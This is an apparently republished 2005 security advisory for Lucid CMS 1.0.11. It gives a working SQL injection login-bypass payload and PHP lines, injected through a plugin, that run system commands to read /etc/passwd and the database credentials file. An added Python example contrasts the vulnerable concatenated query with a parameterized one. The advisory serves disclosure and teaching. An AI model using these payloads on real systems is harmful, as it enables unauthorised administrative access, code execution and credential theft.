Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

2005.09.30
Credit: rgod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

software: lucidCMS
site: http://lucidcms.net/
description: lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of web pages without the overhead and complexity of other available "community" CMS options.

1) If magic_quotes is off -> SQL injection: you can log in as admin by typing the following into the login form:

login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing]

The fifth value, d41d8cd98f00b204e9800998ecf8427e, is the hash of nothing, i.e. the result of md5('').
Note: the "login" value is typed without spaces. The login query becomes:

SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com','d41d8cd98f00b204e9800998ecf8427e','1')/*'

2) Now the new admin can edit templates and insert evil JavaScript code, see the phpinfo(), manage users/groups and activate/disable plugins. You can activate the renderPHP plugin and add the following line at the end of the main stylesheet:

<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>

to see the /etc/passwd file, or

<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>

to see the database username/password, the database name and the table prefix... Now you have full control of the database.

rgod
site: http://altervista.org
mail: retrogod (at) aliceposta (dot) it
original advisory: http://rgod.altervista.org/lucidcms1011.html
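An added example (not the advisory's or lucidCMS's code) that models the login the advisory describes in Python with sqlite3: the concatenated query beside a parameterized one, run against a constructed users table. The column names, the sample account and the SQLite spelling of the UNION (no parentheses) are assumptions.

```python
import hashlib
import hmac
import sqlite3

# Constructed schema: six columns, so the advisory's six-value UNION lines up
# with SELECT *. Column names are assumptions, not lucidCMS's real ones.
SCHEMA = """CREATE TABLE lucid_users (
    id INTEGER, name TEXT, realname TEXT, email TEXT, password TEXT, gid TEXT)"""


def make_db() -> sqlite3.Connection:
    """In-memory database holding one constructed admin account."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute(
        "INSERT INTO lucid_users VALUES (1, 'admin', 'Admin', 'admin@example.invalid', ?, '1')",
        (hashlib.md5(b"correct horse").hexdigest(),),
    )
    return db


# The advisory's login value with the parentheses around SELECT dropped:
# MySQL accepts UNION(SELECT ...), SQLite only accepts UNION SELECT ... .
INJECTED_LOGIN = (
    "'UNION SELECT '1','admin','admin','fake@example.invalid',"
    "'d41d8cd98f00b204e9800998ecf8427e','1'/*"
)


def vulnerable_login(db, login: str, password: str):
    """Query built by concatenation, as the advisory shows (magic_quotes off).
    The UNION row carries md5(''), so an empty password matches it."""
    sql = "SELECT * FROM lucid_users WHERE name='" + login + "'"
    row = db.execute(sql).fetchone()
    if row and row[4] == hashlib.md5(password.encode()).hexdigest():
        return row[1]
    return None


def safe_login(db, login: str, password: str):
    """Same lookup with a bound parameter: the quote, UNION and /* stay data.
    The unsalted md5 check is kept from the original design; it is not the fix."""
    row = db.execute("SELECT * FROM lucid_users WHERE name=?", (login,)).fetchone()
    if row and hmac.compare_digest(row[4], hashlib.md5(password.encode()).hexdigest()):
        return row[1]
    return None
```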



Copyright 2024, cxsecurity.com
